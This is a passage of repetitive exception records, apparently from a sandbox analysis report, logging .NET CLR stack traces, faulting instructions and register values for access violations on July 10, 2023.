_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480672 registers.edi: 37480972 registers.eax: 0 registers.ebp: 37480984 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaff3ea 0xaafed91 0xaaf98ad 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480960 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480968 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 43596236	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafef82 0xaafed91 0xaaf98ad 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480672 registers.edi: 37480972 registers.eax: 0 registers.ebp: 37480984 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaff3ea 0xaafed91 0xaaf98ad 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480960 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480968 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 45086744	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaff85c 0xaaff679 0xaaf9895 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480704 registers.edi: 37481004 registers.eax: 0 registers.ebp: 37481016 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaffc1c 0xaaff679 0xaaf9895 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480992 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37481000 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 42087512	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaff85c 0xaaff679 0xaaf98ad 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480704 registers.edi: 37481004 registers.eax: 0 registers.ebp: 37481016 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaffc1c 0xaaff679 0xaaf98ad 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480992 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37481000 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 43580604	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaff85c 0xaaff679 0xaaf98ad 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480704 registers.edi: 37481004 registers.eax: 0 registers.ebp: 37481016 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaffc1c 0xaaff679 0xaaf98ad 0xaaf8652 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480992 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37481000 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41434356 registers.ecx: 45073408	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0x46c1023 0x46c05ce 0xaaf7339 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37481812 registers.edi: 37482076 registers.eax: 0 registers.ebp: 37481820 registers.edx: 0 registers.ebx: 37483908 registers.esi: 45615092 registers.ecx: 45622068	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0x4c599b1 0x4c597b3 0x4c57ad8 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4c59ae8 registers.esp: 38203300 registers.edi: 38203352 registers.eax: 0 registers.ebp: 38203364 registers.edx: 8810368 registers.ebx: 38204804 registers.esi: 43164544 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad426c1 0xad42522 0xad423f5 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201540 registers.edi: 38201840 registers.eax: 0 registers.ebp: 38201852 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad42c8c 0xad42522 0xad423f5 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201828 registers.edi: 38202172 registers.eax: 0 registers.ebp: 38201836 registers.edx: 0 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 44814444	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad426c1 0xad42522 0xad4240d 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201540 registers.edi: 38201840 registers.eax: 0 registers.ebp: 38201852 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 0	1
